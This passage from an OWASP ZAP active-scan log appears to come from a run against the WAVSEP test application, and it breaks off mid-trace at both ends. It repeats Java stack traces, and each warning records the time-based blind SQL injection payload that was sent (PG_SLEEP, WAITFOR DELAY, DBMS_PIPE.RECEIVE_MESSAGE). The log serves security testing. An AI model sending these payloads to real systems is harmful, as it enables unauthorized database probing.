org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679683 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini AND 2027=(SELECT 2027 FROM PG_SLEEP(5))-- KjgO] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 2027=(SELECT 2027 FROM PG_SLEEP(5))-- KjgO at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679684 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND (2701=2701] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND (2701=2701 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679685 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679686 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND ('VhXp'='VhXp] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND ('VhXp'='VhXp at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679687 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND 'JGpU'='JGpU] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND 'JGpU'='JGpU at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679688 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679689 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- lZjA] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- lZjA at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679689 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) AND 7561=DBMS_PIPE.RECEIVE_MESSAGE(CHR(86)||CHR(79)||CHR(86)||CHR(66),5) AND (4961=4961] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 7561=DBMS_PIPE.RECEIVE_MESSAGE(CHR(86)||CHR(79)||CHR(86)||CHR(66),5) AND (4961=4961 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679690 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini AND 1778=DBMS_PIPE.RECEIVE_MESSAGE(CHR(83)||CHR(120)||CHR(73)||CHR(115),5)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 1778=DBMS_PIPE.RECEIVE_MESSAGE(CHR(83)||CHR(120)||CHR(73)||CHR(115),5) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679691 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') AND 5404=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(88)||CHR(74)||CHR(117),5) AND ('OTbu'='OTbu] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 5404=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(88)||CHR(74)||CHR(117),5) AND ('OTbu'='OTbu at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679692 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' AND 1671=DBMS_PIPE.RECEIVE_MESSAGE(CHR(117)||CHR(79)||CHR(89)||CHR(84),5) AND 'gdAs'='gdAs] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 1671=DBMS_PIPE.RECEIVE_MESSAGE(CHR(117)||CHR(79)||CHR(89)||CHR(84),5) AND 'gdAs'='gdAs at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679693 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' AND 2365=DBMS_PIPE.RECEIVE_MESSAGE(CHR(119)||CHR(118)||CHR(88)||CHR(111),5) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 2365=DBMS_PIPE.RECEIVE_MESSAGE(CHR(119)||CHR(118)||CHR(88)||CHR(111),5) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679693 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini AND 3994=DBMS_PIPE.RECEIVE_MESSAGE(CHR(90)||CHR(67)||CHR(69)||CHR(100),5)-- cUBo] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 3994=DBMS_PIPE.RECEIVE_MESSAGE(CHR(90)||CHR(67)||CHR(69)||CHR(100),5)-- cUBo at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at 